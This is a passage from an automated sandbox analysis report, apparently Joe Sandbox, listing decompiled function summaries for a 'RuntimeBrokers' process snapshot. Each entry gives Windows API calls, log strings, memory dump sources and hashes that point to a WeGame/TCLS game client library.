                                        • GetLastError.KERNEL32(?,00000084,6C154662,?,?,00000104,?,?,?,?,?,?,?,00000002,00000000), ref: 6C1560F7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,00000084,6C154662,?,?,00000104,?,?,?,?,?,?,?,00000002,00000000), ref: 6C156103
                                        • GetLastError.KERNEL32(?,00000084,6C154662,?,?,00000104,?,?,?,?,?,?,?,00000002,00000000), ref: 6C156159
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,00000084,6C154662,?,?,00000104,?,?,?,?,?,?,?,00000002,00000000), ref: 6C156165
                                        • UnmapViewOfFile.KERNEL32(00000000,?,00000005,d:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h,0000002A,6C3CE62F,?,00000084,6C154662,?,?,00000104), ref: 6C1561D6
                                        • CloseHandle.KERNEL32(00000000,?,00000005,d:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h,0000002A,6C3CE62F,?,00000084,6C154662,?,?,00000104), ref: 6C1561E1
                                        Strings
                                        • d:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h, xrefs: 6C156130, 6C15618A
                                        • [ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%d, xrefs: 6C1561B3
                                        • [ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d, xrefs: 6C156152
                                        • Global\%s_%X_%d, xrefs: 6C1560A3
                                        • TENINSTIP, xrefs: 6C15607C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$?get_log_instance@base@@ErrorLastLogger@1@View$CloseH_prolog3_HandleMappingOpenUnmapmemmove
                                        • String ID: Global\%s_%X_%d$TENINSTIP$[ProcessHelp][RetrieveGameImagePathByProcessId]MapViewOfFile fail, hListMap:%p, err:%d$[ProcessHelp][RetrieveGameImagePathByProcessId]OpenFileMappingA fail, iamge path:%s, err:%d$d:\ci_dev\wegame_client\dependences\tpf_for_tgp_sdk\include\teniobase\template\processhelp_t.h
                                        • API String ID: 3156181753-426698544
                                        • Opcode ID: 10a5675cdc5d3f8fcdddd2e5e596ec7d65f3625e5c8ded5d1387ff6e39519dae
                                        • Instruction ID: 5ccd978d7f49f8a5ea989581b709462d712f38fd3abceb02874d659dc7c1bdb8
                                        • Opcode Fuzzy Hash: 10a5675cdc5d3f8fcdddd2e5e596ec7d65f3625e5c8ded5d1387ff6e39519dae
                                        • Instruction Fuzzy Hash: 5B4180B1A00619AFEB20DF64CC45FAD77B8AB55308F408498B928EB791DB359E158F90
                                        Function 6C0C2D24 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 105libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0C2D2B
                                        • ?Create@CShareMem@@QAEHPBDH@Z.COMMON(?,?,000000FD,80000000,00000000,?,?,?,?,?,?,?,0000001C), ref: 6C0C2DBD
                                        • IsWindow.USER32(?), ref: 6C0C2DC9
                                        • LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,0000001C), ref: 6C0C2DDB
                                        • GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6C0C2DED
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,0000001C), ref: 6C0C2DFD
                                        • ?shutdown@Application@common@ierd_tgp@@EAEXXZ.COMMON([SimpleIPC]ERROR, Self window: %d.,?,?,?,?,?,?,0000001C), ref: 6C0C2E15
                                        • ?WriteIPCInfo@CSimpleIPC@@AAEXXZ.COMMON(?,?,?,?,?,0000001C), ref: 6C0C2E1E
                                        • ?Notify@CSimpleIPC@@QAEHKPAXH@Z.COMMON(00000001,00000000,00000000,?,?,?,?,?,0000001C), ref: 6C0C2E2A
                                        Strings
                                        • ChangeWindowMessageFilter, xrefs: 6C0C2DE7
                                        • [SimpleIPC]Self window: %d., xrefs: 6C0C2E06
                                        • [SimpleIPC]ERROR, Self window: %d., xrefs: 6C0C2E10
                                        • WeGameIPCShareMem10, xrefs: 6C0C2D73
                                        • user32.dll, xrefs: 6C0C2DD6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: LibrarySimple$?shutdown@AddressApplication@common@ierd_tgp@@Create@FreeH_prolog3_Info@LoadMem@@Notify@ProcShareWindowWrite
                                        • String ID: ChangeWindowMessageFilter$WeGameIPCShareMem10$[SimpleIPC]ERROR, Self window: %d.$[SimpleIPC]Self window: %d.$user32.dll
                                        • API String ID: 1425942052-3095242511
                                        • Opcode ID: 11fb9f7e154d2fe3451e30801cb9267b86f76df6019e47a2d299ff494366c1b6
                                        • Instruction ID: 8b4c269add1a019127cde7055dfe1add76594229ebf6732a99a772f38bbd8ecc
                                        • Opcode Fuzzy Hash: 11fb9f7e154d2fe3451e30801cb9267b86f76df6019e47a2d299ff494366c1b6
                                        • Instruction Fuzzy Hash: 453101317007019FDB14DFA48848BAE77F4AF59718F60642CE016B7E90DB74E906CB62
                                        Function 6C14F92F Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 209comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C14F936
                                        • CoInitializeEx.OLE32(00000000,00000002,00000064), ref: 6C14F95A
                                        • CoCreateInstance.OLE32(6C35C5F0,00000000,00000001,6C35C570,00000000), ref: 6C14F976
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C14FA47
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000CDC,6C3CE62F), ref: 6C14FA80
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?), ref: 6C14FB18
                                        • GetLastError.KERNEL32(00000000,00000005,d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp,00000CE4,6C3CE62F), ref: 6C14FB55
                                        • CoUninitialize.OLE32(?), ref: 6C14FB78
                                        Strings
                                        • [Sys_wrapper][CreatDesktopShortcut] QueryInterface failed.error_code=%u, xrefs: 6C14FAF1
                                        • [Sys_wrapper][CreatDesktopShortcut] Save lnk file failed.error_code=%u, xrefs: 6C14FA87
                                        • [Sys_wrapper][CreatDesktopShortcut] CoCreateInstance failed.error_code=%u, xrefs: 6C14FB5C
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C14FA6B, 6C14FAD1, 6C14FB3C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@ErrorLastLogger@1@$CreateH_prolog3_InitializeInstanceUninitialize
                                        • String ID: [Sys_wrapper][CreatDesktopShortcut] CoCreateInstance failed.error_code=%u$[Sys_wrapper][CreatDesktopShortcut] QueryInterface failed.error_code=%u$[Sys_wrapper][CreatDesktopShortcut] Save lnk file failed.error_code=%u$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 2514339084-1395465581
                                        • Opcode ID: 54dda16928e7ab71c3e34f4b3cde0e97b44c428030355b112bc55d28933edd10
                                        • Instruction ID: 9bf5bbcd81fab6fa9c246be15fc1987d68bc9fb8f3aa56d22bbc44c1ae32a6db
                                        • Opcode Fuzzy Hash: 54dda16928e7ab71c3e34f4b3cde0e97b44c428030355b112bc55d28933edd10
                                        • Instruction Fuzzy Hash: 9B713570A01304AFDB14DFA8C894F9E77B5AF46309F208158E925AB790DB35ED49CFA1
                                        Function 6C153DD1 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 157COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C153DDB
                                        • GetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,?,00000000,?,?,?,?,?,?,00000080), ref: 6C153E11
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000080), ref: 6C153E1D
                                        • BuildExplicitAccessWithNameW.ADVAPI32(?,?,001F01FF,00000001,00000003,?,?,?,?,?,00000080), ref: 6C153E82
                                        • SetEntriesInAclW.ADVAPI32(00000001,?,?,?,?,?,?,?,?,00000080), ref: 6C153EA3
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000080), ref: 6C153EAF
                                        • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000004,00000000,00000000,?,00000000,?,?,?,?,?,00000080), ref: 6C153F0D
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000080), ref: 6C153F19
                                        • LocalFree.KERNEL32(00000000), ref: 6C153F7F
                                        • LocalFree.KERNEL32(00000000), ref: 6C153F8A
                                        Strings
                                        • [ModifyFileAccessTrustee]SetNamedSecurityInfoW failed, error %d, xrefs: 6C153F55
                                        • [ModifyFileAccessTrustee]GetNamedSecurityInfoW failed, error %d, xrefs: 6C153E5F
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C153E49, 6C153EDB, 6C153F3D
                                        • [ModifyFileAccessTrustee]SetEntriesInAclW failed, error %d, xrefs: 6C153EF1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@Logger@1@$FreeInfoLocalNamedSecurity$AccessBuildEntriesExplicitH_prolog3_NameWith
                                        • String ID: [ModifyFileAccessTrustee]GetNamedSecurityInfoW failed, error %d$[ModifyFileAccessTrustee]SetEntriesInAclW failed, error %d$[ModifyFileAccessTrustee]SetNamedSecurityInfoW failed, error %d$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 1988137380-1624467944
                                        • Opcode ID: 6090952b12979f161071c36477f5338cecfcfb9b7cd040181dda61bc5747ad9f
                                        • Instruction ID: 32e7c7db582d23734478f0aac0d7ed76e13ca9371c3abfaf9789a8a3654075d6
                                        • Opcode Fuzzy Hash: 6090952b12979f161071c36477f5338cecfcfb9b7cd040181dda61bc5747ad9f
                                        • Instruction Fuzzy Hash: A051F1B1A01705ABDB11CF94CC80F9E77B9AF80708F604159F524AB684DB76AD0ACFA1
                                        Function 6C0C3D44 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 94stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C0C3D70
                                        • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000100,?), ref: 6C0C3D89
                                        • CreateWindowExA.USER32(00000000,static,?,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6C0C3DC5
                                        • SetLastError.KERNEL32(00000000), ref: 6C0C3DD3
                                        • SetWindowLongA.USER32(00000000,000000FC,?), ref: 6C0C3DDD
                                        • GetLastError.KERNEL32 ref: 6C0C3DF0
                                        • SetLastError.KERNEL32(00000000), ref: 6C0C3DF8
                                        • SetWindowLongA.USER32(00000000,000000EB), ref: 6C0C3E02
                                        • GetLastError.KERNEL32 ref: 6C0C3E0C
                                        • DestroyWindow.USER32(00000000), ref: 6C0C3E13
                                        • ShowWindow.USER32(00000000,00000000), ref: 6C0C3E20
                                        • UpdateWindow.USER32(00000000), ref: 6C0C3E27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Window$ErrorLast$Long$CreateDestroyShowUpdatememsetstrcpy_s
                                        • String ID: TCLS_CORE_WND_%u$static
                                        • API String ID: 698125720-2282508738
                                        • Opcode ID: 292a2d760442ddda9f3c201ff331ade2861c9eb2a590e5a122a0c72a4fb37991
                                        • Instruction ID: 0eea86864c5fed3c85415719d79c7a8311a11aed299526e769e40c9a2bc47b19
                                        • Opcode Fuzzy Hash: 292a2d760442ddda9f3c201ff331ade2861c9eb2a590e5a122a0c72a4fb37991
                                        • Instruction Fuzzy Hash: EC21A1B17112557BDA209B648C49FAF77FCDF0E715F000114FA19E7680DAB4E9408BA6
                                        Function 6C15A6D1 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 188COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15A6DB
                                          • Part of subcall function 6C1C2E95: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C0B621D,0000002C,0000000C,6C0B5702,00000004,6C0B57B1,00000214), ref: 6C1C2EAA
                                        • memset.VCRUNTIME140(?,00000000,00000208,Select Folder), ref: 6C15A79B
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,00000000,00000208,Select Folder), ref: 6C15A7D6
                                        • memset.VCRUNTIME140(?,00000000,00000058,?,?,?,?,?,00000000,00000208,Select Folder), ref: 6C15A7E5
                                        • GetOpenFileNameW.COMDLG32 ref: 6C15A897
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000008), ref: 6C15A8C0
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000008), ref: 6C15A8C7
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C15A945
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • [Sys_wrapper]dir_select_dialog, GetOpenFileNameW failed, xrefs: 6C15A980
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C15A8EF, 6C15A969
                                        • Select Folder, xrefs: 6C15A77E
                                        • [Sys_wrapper]dir_select_dialog, path:%s, xrefs: 6C15A914
                                        • X, xrefs: 6C15A849
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@D@std@@Logger@1@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@std@@memset$?u16to8@common@ierd_tgp@@?u8to16@common@ierd_tgp@@D@2@@4@@D@2@@std@@FileH_prolog3H_prolog3_H_prolog3_catch_NameOpenW@2@@4@@W@2@@std@@malloc
                                        • String ID: Select Folder$X$[Sys_wrapper]dir_select_dialog, GetOpenFileNameW failed$[Sys_wrapper]dir_select_dialog, path:%s$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 2917205412-840117925
                                        • Opcode ID: 45cb4ed726c59e4ec678b7ba0869ead7f4034f9b2caffbd1c2af0200de07c1fd
                                        • Instruction ID: 32a0140a0e098b9b62e1b2c42768787ff70244c38bf3170c595c4737c863b52a
                                        • Opcode Fuzzy Hash: 45cb4ed726c59e4ec678b7ba0869ead7f4034f9b2caffbd1c2af0200de07c1fd
                                        • Instruction Fuzzy Hash: 7F8145B0941269ABDB20DF64CC88BDDBBB4AF14308F5041E9E018B7690DB75AF88CF51
                                        Function 6C0C7893 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 97windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?stamp_point@@YAXPBD@Z.COMMON(sys_begin), ref: 6C0C789E
                                          • Part of subcall function 6C14A212: GetCurrentThread.KERNEL32 ref: 6C14A223
                                          • Part of subcall function 6C14A212: SetThreadAffinityMask.KERNEL32(00000000), ref: 6C14A22A
                                          • Part of subcall function 6C14A212: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0F8462,init plugin end:), ref: 6C14A236
                                          • Part of subcall function 6C14A212: GetCurrentThread.KERNEL32 ref: 6C14A23D
                                          • Part of subcall function 6C14A212: SetThreadAffinityMask.KERNEL32(00000000), ref: 6C14A244
                                          • Part of subcall function 6C14A212: strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000050,?,000000FF,?,?,?,6C0F8462,init plugin end:), ref: 6C14A261
                                        • QueryPerformanceFrequency.KERNEL32(6C4385D0), ref: 6C0C78B6
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C0C78C1
                                        • TranslateMessage.USER32(?), ref: 6C0C78D8
                                        • DispatchMessageW.USER32(?), ref: 6C0C78E2
                                        • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(0000012C), ref: 6C0C78F9
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C0C7902
                                        • __aulldiv.LIBCMT ref: 6C0C7980
                                        • PeekMessageA.USER32(?,00000000,00000113,00000113,00000000), ref: 6C0C799D
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6C0C79BC
                                        • ?stamp_point@@YAXPBD@Z.COMMON(sys_end), ref: 6C0C79CF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: MessagePerformanceQueryThread$Counter$?stamp_point@@AffinityCurrentMaskPeek$?exit_app@Application@common@ierd_tgp@@DispatchFrequencyTranslate__aulldivstrncpy_s
                                        • String ID: sys_begin$sys_end
                                        • API String ID: 1457437935-3668967762
                                        • Opcode ID: d42fdc357abfbf0ca896fa1d039499f815739b36f81346c0e6ed6fa68853a930
                                        • Instruction ID: 2c307e2661696d33ea479d692bb943a1bd55c5174d7f9ac5c3636e8d8f9bb426
                                        • Opcode Fuzzy Hash: d42fdc357abfbf0ca896fa1d039499f815739b36f81346c0e6ed6fa68853a930
                                        • Instruction Fuzzy Hash: AD316175B00248AFDF10EFE9C5D4A9EB7FDEB46308B104526F905E7680EB349908CB21
                                        Function 0047644C Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 430COMMON
                                        Download Yara Rule
                                        Strings
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data, xrefs: 0047689F
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data, xrefs: 004768E9
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] , xrefs: 00476AB5
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] , xrefs: 00476A4F
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] , xrefs: 00476A14
                                        • TGP:%s, xrefs: 00476700
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data, xrefs: 0047694B
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] , xrefs: 00476AF0
                                        • [TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data, xrefs: 00476995
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: TGP:%s$[TCLS_Launcher][TCLS_Launcher::TgpFillData] $[TCLS_Launcher][TCLS_Launcher::TgpFillData] $[TCLS_Launcher][TCLS_Launcher::TgpFillData] $[TCLS_Launcher][TCLS_Launcher::TgpFillData] $[TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data$[TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data$[TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data$[TCLS_Launcher][TCLS_Launcher::TgpFillData] fill_data
                                        • API String ID: 0-612837070
                                        • Opcode ID: 83e4216567e0eb9dbe82d7cb6c4072e8689efdc9148e0bf6e23738d25896e996
                                        • Instruction ID: e042b30198b21325f378492bad3c819cd52b5f4d8e532f222a9c1328f86a0a21
                                        • Opcode Fuzzy Hash: 83e4216567e0eb9dbe82d7cb6c4072e8689efdc9148e0bf6e23738d25896e996
                                        • Instruction Fuzzy Hash: E922F474A902289FDB20DB14DC8DBE9B7B1BF18315F1544E9E51DAB2A1C7B4AE80CF14
                                        Function 6C0F3C5C Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 232threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0F3C66
                                        • ?gen_seq_num@@YAGXZ.COMMON(00000090,6C0F1783,?,?,?,?,?,?,?,?,?,00000004), ref: 6C0F3C8C
                                          • Part of subcall function 6C0F2BF6: __EH_prolog3.LIBCMT ref: 6C0F2BFD
                                          • Part of subcall function 6C0F0AFA: __EH_prolog3.LIBCMT ref: 6C0F0B01
                                        • GetTickCount.KERNEL32 ref: 6C0F3DAD
                                        • _Copy_construct_from.LIBCPMT ref: 6C0F3DD2
                                        • GetTickCount.KERNEL32 ref: 6C0F3DEE
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0F3DFA
                                        • _Copy_construct_from.LIBCPMT ref: 6C0F3E84
                                        • _Copy_construct_from.LIBCPMT ref: 6C0F3ECD
                                        • ?PostMainThreadTask@common@ierd_tgp@@YAXV?$function@$$A6AXXZ@std@@V?$shared_ptr@X@4@@Z.COMMON(?), ref: 6C0F3F36
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • 2, xrefs: 6C0F3E52
                                        • d:\ci_dev\wegame_client\codes\common\src\comm_center.cpp, xrefs: 6C0F3E1C
                                        • send_broadcast post_msg_cpp_func to cpp:%s, execute_time:%u, xrefs: 6C0F3E36
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
